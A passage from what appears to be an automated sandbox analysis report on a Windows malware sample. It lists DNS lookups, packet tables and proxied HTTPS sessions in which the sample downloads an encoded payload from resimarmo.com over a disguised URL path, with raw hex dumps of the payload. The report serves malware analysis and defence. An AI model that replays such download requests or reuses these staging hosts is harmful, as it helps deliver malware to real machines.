CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey, InitializeAcl
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
URL	AddMIMEFileTypesPS

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2022 14:00:14.157608986 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.157653093 CEST	443	49738	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.157749891 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.175244093 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.175272942 CEST	443	49738	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.256916046 CEST	443	49738	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.257044077 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.549293995 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.549335957 CEST	443	49738	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.549879074 CEST	443	49738	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.549963951 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.552407980 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.589138031 CEST	443	49738	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.589188099 CEST	443	49738	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.589248896 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.589283943 CEST	443	49738	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.589299917 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.589358091 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.589493990 CEST	443	49738	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.589589119 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.591650009 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.591686964 CEST	49738	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.613600969 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.613651991 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.613815069 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.614305019 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.614327908 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.683535099 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.683706999 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.690536976 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.690557957 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.695112944 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.695132971 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.745538950 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.745584011 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.745635986 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.745651960 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.745661020 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.745668888 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.745711088 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.745717049 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.745738983 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.745773077 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.775381088 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.775481939 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.775520086 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.775589943 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.775618076 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.775675058 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.775707960 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.775768995 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.775798082 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.775862932 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.775871992 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.775887966 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.775899887 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.775933027 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.775958061 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.805725098 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.805907011 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.805957079 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.805977106 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.805999994 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806030989 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806087971 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.806152105 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806180000 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.806231022 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806252956 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806269884 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.806337118 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806354046 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.806412935 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806438923 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.806525946 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.806526899 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806545973 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.806577921 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806596041 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806633949 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.806694984 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806719065 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.806782007 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.806929111 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.807071924 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.807096004 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.807168007 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.836864948 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.836996078 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837054014 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837127924 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837198019 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837264061 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837332010 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837399006 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837440014 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837512016 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837538004 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837598085 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837625980 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837713957 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837752104 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837770939 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837794065 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837804079 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837827921 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837840080 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837883949 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837897062 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837898970 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837924004 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.837955952 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.837980986 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838010073 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838076115 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838108063 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838200092 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838234901 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838246107 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838265896 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838278055 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838314056 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838326931 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838341951 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838370085 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838377953 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838387966 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838428974 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838454008 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838479996 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838582993 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838629961 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838695049 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838730097 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838794947 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838824987 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.838887930 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.838947058 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.839015007 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.839037895 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.839097977 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.839196920 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.839286089 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.839298010 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.839318037 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.839428902 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.839498043 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.839517117 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.839531898 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.839545965 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.839553118 CEST	443	49742	109.234.162.66	192.168.2.3
Aug 8, 2022 14:00:14.839584112 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.839610100 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.844352007 CEST	49742	443	192.168.2.3	109.234.162.66
Aug 8, 2022 14:00:14.844374895 CEST	443	49742	109.234.162.66	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2022 14:00:14.115520954 CEST	56417	53	192.168.2.3	8.8.8.8
Aug 8, 2022 14:00:14.133173943 CEST	53	56417	8.8.8.8	192.168.2.3
Aug 8, 2022 14:02:27.160160065 CEST	59795	53	192.168.2.3	8.8.8.8
Aug 8, 2022 14:02:27.387588978 CEST	53	59795	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 8, 2022 14:00:14.115520954 CEST	192.168.2.3	8.8.8.8	0x2f99	Standard query (0)	resimarmo.com	A (IP address)	IN (0x0001)
Aug 8, 2022 14:02:27.160160065 CEST	192.168.2.3	8.8.8.8	0x4504	Standard query (0)	www.admiral-juegos.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 8, 2022 14:00:14.133173943 CEST	8.8.8.8	192.168.2.3	0x2f99	No error (0)	resimarmo.com		109.234.162.66	A (IP address)	IN (0x0001)
Aug 8, 2022 14:02:27.387588978 CEST	8.8.8.8	192.168.2.3	0x4504	No error (0)	www.admiral-juegos.com		208.91.197.91	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

resimarmo.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49738	109.234.162.66	443	C:\Users\user\Desktop\1a#U00bb.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-08 12:00:14 UTC	0	OUT	GET /yakdatafilesloadsonedrivedocumentsuploadgoogledownload/Djfypqyfxwyivtfoakxovbbaompeayl HTTP/1.1 User-Agent: lVali Host: resimarmo.com
2022-08-08 12:00:14 UTC	0	IN	HTTP/1.1 200 OK Date: Mon, 08 Aug 2022 12:00:13 GMT Content-Length: 177627 Connection: close Last-Modified: Mon, 08 Aug 2022 05:40:47 GMT Server: o2switch-PowerBoost-v3 Accept-Ranges: bytes
2022-08-08 12:00:14 UTC	0	IN	Data Raw: 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 a7 28 b1 b3 a3 3a a1 a3 38 9b 3c a1 9f 34 3a a3 a7 a9 36 b3 40 af af 40 9d a3 a9 28 32 36 ad a9 af 9d a3 2c 34 ab a3 28 3a ab 36 b1 9b 34 36 a3 a5 ad 2c 32 a5 2a 3c 3e 2c 30 ad ad 2c a9 b3 32 2a 38 a7 ad 28 38 ab 9d 9b a3 2a 32 2c b1 34 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 7d a3 9f 40 a9 38 40 9f b1 3e 40 30 af ad 9f 36 28 32 b1 36 af 9b 9b 28 36 34 a9 2c 28 40 a5 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 cd 62 bb b9 c9 50 cb c9 52 d1 56 cb d5 5e 50 c9 cd c3 5c b9 4a c5 c5 4a d7 c9 c3 62 58 5c c7 c3 c5 d7 c9 66 5e Data Ascii: cay y&&y]_ca&&y]]y(:8<4:6@@(26,4(:646,2<>,0,28(8*2,4cay y&&y]_ca&&y]]y}@8@>@06(26(64,(@cay y&&y]_ca&&y]]ybPRV^P\JJbX\f^
2022-08-08 12:00:14 UTC	4	IN	Data Raw: e0 8d 56 44 61 5e 1f 28 05 99 a4 9b cd 7d be db 52 ee f1 30 2a 82 83 0a bb 01 ad 44 9e 96 ac 71 aa 6c ad c4 fc 87 7f ec e8 ba 09 32 a9 ea 7a 2d 91 d8 12 f7 5f 72 cb 4d 32 47 44 c5 c1 53 2c 23 1c 31 31 1d 25 c3 be 85 b1 70 b7 29 db a2 34 46 0c 90 25 6c 76 f5 24 d8 7e 16 86 11 6f e6 6d d5 2f 71 b5 d2 28 49 f5 37 55 7b db e5 c1 b7 c5 37 4e 18 1b 5d b7 5a ce df 51 01 cb d7 fb 76 fc 3f 27 d2 3f e9 f5 91 77 1d 37 e8 8c 57 07 08 dc 8f 05 83 14 63 60 53 a9 5f 0e f2 b4 95 99 e1 98 ff c6 da f0 7b 22 4d d7 05 c2 75 62 93 9d d8 4b 5a 76 21 c0 2f f5 9b 5c fb 87 da e0 fd 9f 32 3c 9f ce a9 45 5d 62 21 09 6a b4 3b 8a 13 e9 09 bd 8b aa 08 1a 77 fe 5f ef 2d 51 d5 27 01 bb fb 90 91 71 25 3d 60 fa fb 98 c3 0b 19 9f 3d 4b 82 02 54 e4 a6 3b a8 8c c2 a2 2c 95 85 00 40 9f 2a 6f Data Ascii: VDa^(}R0Dql2z-_rM2GDS,#11%p)4F%lv$~om/q(I7U{7N]ZQv?'?w7Wc`S_{"MubKZv!/\2<E]b!j;w_-Q'q%=`=KT;,@o

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49742	109.234.162.66	443	C:\Users\user\Desktop\1a#U00bb.exe

Timestamp	kBytes transferred	Direction	Data
2022-08-08 12:00:14 UTC	8	OUT	GET /yakdatafilesloadsonedrivedocumentsuploadgoogledownload/Djfypqyfxwyivtfoakxovbbaompeayl HTTP/1.1 User-Agent: 7@ Host: resimarmo.com
2022-08-08 12:00:14 UTC	8	IN	HTTP/1.1 200 OK Date: Mon, 08 Aug 2022 12:00:13 GMT Content-Length: 177627 Connection: close Last-Modified: Mon, 08 Aug 2022 05:40:47 GMT Server: o2switch-PowerBoost-v3 Accept-Ranges: bytes
2022-08-08 12:00:14 UTC	8	IN	Data Raw: 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 a7 28 b1 b3 a3 3a a1 a3 38 9b 3c a1 9f 34 3a a3 a7 a9 36 b3 40 af af 40 9d a3 a9 28 32 36 ad a9 af 9d a3 2c 34 ab a3 28 3a ab 36 b1 9b 34 36 a3 a5 ad 2c 32 a5 2a 3c 3e 2c 30 ad ad 2c a9 b3 32 2a 38 a7 ad 28 38 ab 9d 9b a3 2a 32 2c b1 34 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 7d a3 9f 40 a9 38 40 9f b1 3e 40 30 af ad 9f 36 28 32 b1 36 af 9b 9b 28 36 34 a9 2c 28 40 a5 63 61 f0 ec 79 fc 20 8d e8 79 ea 0e 26 26 8d 79 ea 5d ec 97 5f 63 61 f0 26 26 ea 79 5d ea fc fe 5d ea e8 79 cd 62 bb b9 c9 50 cb c9 52 d1 56 cb d5 5e 50 c9 cd c3 5c b9 4a c5 c5 4a d7 c9 c3 62 58 5c c7 c3 c5 d7 c9 66 5e Data Ascii: cay y&&y]_ca&&y]]y(:8<4:6@@(26,4(:646,2<>,0,28(8*2,4cay y&&y]_ca&&y]]y}@8@>@06(26(64,(@cay y&&y]_ca&&y]]ybPRV^P\JJbX\f^
2022-08-08 12:00:14 UTC	12	IN	Data Raw: e0 8d 56 44 61 5e 1f 28 05 99 a4 9b cd 7d be db 52 ee f1 30 2a 82 83 0a bb 01 ad 44 9e 96 ac 71 aa 6c ad c4 fc 87 7f ec e8 ba 09 32 a9 ea 7a 2d 91 d8 12 f7 5f 72 cb 4d 32 47 44 c5 c1 53 2c 23 1c 31 31 1d 25 c3 be 85 b1 70 b7 29 db a2 34 46 0c 90 25 6c 76 f5 24 d8 7e 16 86 11 6f e6 6d d5 2f 71 b5 d2 28 49 f5 37 55 7b db e5 c1 b7 c5 37 4e 18 1b 5d b7 5a ce df 51 01 cb d7 fb 76 fc 3f 27 d2 3f e9 f5 91 77 1d 37 e8 8c 57 07 08 dc 8f 05 83 14 63 60 53 a9 5f 0e f2 b4 95 99 e1 98 ff c6 da f0 7b 22 4d d7 05 c2 75 62 93 9d d8 4b 5a 76 21 c0 2f f5 9b 5c fb 87 da e0 fd 9f 32 3c 9f ce a9 45 5d 62 21 09 6a b4 3b 8a 13 e9 09 bd 8b aa 08 1a 77 fe 5f ef 2d 51 d5 27 01 bb fb 90 91 71 25 3d 60 fa fb 98 c3 0b 19 9f 3d 4b 82 02 54 e4 a6 3b a8 8c c2 a2 2c 95 85 00 40 9f 2a 6f Data Ascii: VDa^(}R0Dql2z-_rM2GDS,#11%p)4F%lv$~om/q(I7U{7N]ZQv?'?w7Wc`S_{"MubKZv!/\2<E]b!j;w_-Q'q%=`=KT;,@o
2022-08-08 12:00:14 UTC	16	IN	Data Raw: 86 ca 24 71 f1 02 2d 03 7f fa 0b 9f 9e 2e b2 24 1a f9 01 36 a1 14 14 51 b9 2a 4d e7 c4 28 e3 b0 e1 08 7c 54 08 f3 ab 23 4d 7a 32 73 f4 35 9a 33 3a 6f 9a f8 77 fd 47 2d c0 da d1 27 f5 b2 33 13 59 d2 54 7d 40 b4 4e 56 36 40 f1 b9 e4 29 79 6e 53 e6 85 f7 10 65 45 e2 fd d0 90 63 97 9b 67 a9 3c 81 4b 85 79 cc 78 52 ba b8 27 8a ce b3 75 e8 cb eb d8 7d 49 fc 99 1e de 6c ab 2b 87 75 ee 15 42 b5 bd 7f be 65 f2 84 c5 97 30 e4 7f 70 d8 06 a3 44 ee 4d 30 0d e4 b3 ad 7c d0 42 52 e2 af e2 ed 20 c2 9e 68 5e 96 26 b4 ee 89 34 04 a4 71 96 15 3d 9d 5f c1 76 19 2e 6f 2f ec d3 cc fc 77 cb 28 d3 7f 9c e6 5f ad 1b 9c eb f1 c0 38 ff 5e 52 bb f0 b9 99 e5 48 90 fd 2d 06 52 0b a9 1e 4e 42 5b e8 09 1d 2c 88 af ae 12 93 8f 79 be 95 52 a7 7d 24 09 e0 a4 34 db 58 a2 ce 44 7f c4 aa 98 Data Ascii: $q-.$6Q*M(\|T#Mz2s53:owG-'3YT}@NV6@)ynSeEcg<KyxR'u}Il+uBe0pDM0\|BR h^&4q=_v.o/w(_8^RH-RNB[,yR}$4XD
2022-08-08 12:00:14 UTC	20	IN	Data Raw: f2 27 9b f6 81 00 79 4e 29 af e4 1a c9 75 bf bc 4b 66 16 39 a2 d2 ea dd 76 70 ce ae 26 35 e7 f4 80 d5 53 9f 49 ce c9 32 52 17 30 08 a9 04 be 71 f7 0e 6f 16 56 a5 77 1d 99 24 91 7e 90 42 18 c7 40 a9 42 b2 9e 15 52 34 55 25 12 d4 5e e2 0a 78 de e7 07 55 6f ec ac c9 b6 42 45 8f 1a d3 90 d1 9e 1d 74 4f 2a 8d 12 4f 89 31 15 3f 43 fa 3f f4 62 42 de db 1d a5 55 5f 62 7f 05 d8 e9 0e 31 20 43 74 5b 87 3a 17 55 b9 7b 06 cc 07 77 eb ef d5 06 f8 c5 17 00 d2 55 17 c4 89 5f 77 f1 91 01 a3 d7 a1 5c b2 9c 1e cc fd a4 7c ec 51 cd 49 e3 62 23 a6 67 de 12 9d f0 74 8f 46 54 f4 95 ee d2 1d d2 6c 2f 5b 1b 37 14 7b 5c 5e f0 f6 7d ef 97 48 b9 5a 31 8f dc 9e 87 08 ee 03 6f dc 42 b6 e2 e0 00 c3 ae 56 ef 5d da 0a d4 78 ad 3b d8 f7 1e bc 5e 3c bb 0f 7a 07 7a 9e 75 25 15 ca a1 a0 13 Data Ascii: 'yN)uKf9vp&5SI2R0qoVw$~B@BR4U%^xUoBEtO*O1?C?bBU_b1 Ct[:U{wU_w\\|QIb#gtFTl/[7{\^}HZ1oBV]x;^<zzu%
2022-08-08 12:00:14 UTC	24	IN	Data Raw: 3b d8 66 aa b4 1b 11 49 c1 21 9e 7b 64 6b 7f c2 fb ab bb 16 a7 b5 f6 79 f6 c9 82 90 77 f5 ea 2f 99 90 e6 0d d0 a6 6b 84 f6 15 78 ed ed 2f ca f5 0f 4a f2 f1 9e e1 e9 22 d6 7b 54 ba 42 b2 67 c4 05 ba 77 d9 b8 ee 55 28 de 8c 75 81 42 d9 71 b3 2c ef 25 a0 ae 78 1e 65 49 4c 8d 1a ef f1 79 cc 7a 9a 3e 1f cf 63 bc c3 e1 d8 24 e2 bb 78 d3 1d ec 03 e7 cf 18 da 10 64 c8 87 b9 e6 2e 6d 96 3d 0e bf 79 18 66 f2 d3 e4 4a 91 ef c9 a8 a3 bc 54 16 cd 5f be 70 dc d0 15 d7 84 d8 24 07 3a 50 93 0f 02 a9 55 11 d6 b3 61 7b eb 57 6e 10 c7 8b 50 49 b3 c5 8c f0 6a 37 67 ae 81 c4 c8 e8 38 4e 20 07 a1 21 ca ed d9 df ad 46 50 4e 1b 86 f3 73 a1 53 f0 42 0a 40 f8 6c 7a 05 2f 4d 40 80 31 70 27 40 35 91 da d9 10 1e 3b 9e 24 28 6f b7 77 f1 4c a5 48 cb cb c3 3b f7 c2 e8 69 37 aa ce 27 5e Data Ascii: ;fI!{dkyw/kx/J"{TBgwU(uBq,%xeILyz>c$xd.m=yfJT_p$:PUa{WnPIj7g8N !FPNsSB@lz/M@1p'@5;$(owLH;i7'^
2022-08-08 12:00:14 UTC	28	IN	Data Raw: ff 4b 72 11 e9 d1 02 43 20 e1 38 5c b9 b5 89 48 26 43 2c 84 58 bf 0a ff e7 7a fd b2 65 2c 2f 7f 86 db f8 52 e8 c0 56 cd 4b 12 5c 1e ae 2c 8f f2 d5 4e 63 22 a1 32 6f a4 2b 64 1b 11 7d 68 19 c6 01 0a 5f 38 42 9b 10 54 0e e0 72 51 58 18 44 79 a8 e1 c5 8d d9 12 7b 08 d0 f8 34 99 e4 92 85 6b 2b 54 58 07 1b 5e 6b 81 d5 ea c9 7b e2 95 3e ef 63 2d 6f c5 2a e6 4f 4e 19 c7 14 78 3c 11 ff 72 9a a0 ba f2 4f fb f2 45 82 67 f7 9a c3 b5 73 09 8f 29 d6 f9 eb 00 c4 ec 46 ed 60 d2 d7 8e 50 72 cd b2 45 5a 52 b7 1f ed 25 2b 13 25 5f 9c d3 63 7f 3f 3b 0c 05 3a 2d 3f 4b d9 54 46 45 13 9f 36 41 4e 6d 79 16 80 11 fe bd 8b 62 db d9 0f 27 cd f8 9a b4 a6 82 74 c7 e8 83 76 87 5a 8a 81 1c 7d 80 c2 4d ff 44 11 09 0b aa 03 91 3b 1b fe 42 35 be be a9 91 f8 75 88 09 60 26 4e 3b 14 ba e3 Data Ascii: KrC 8\H&C,Xze,/RVK\,Nc"2o+d}h_8BTrQXDy{4k+TX^k{>c-o*ONx<rOEgs)F`PrEZR%+%_c?;:-?KTFE6ANmyb'tvZ}MD;B5u`&N;
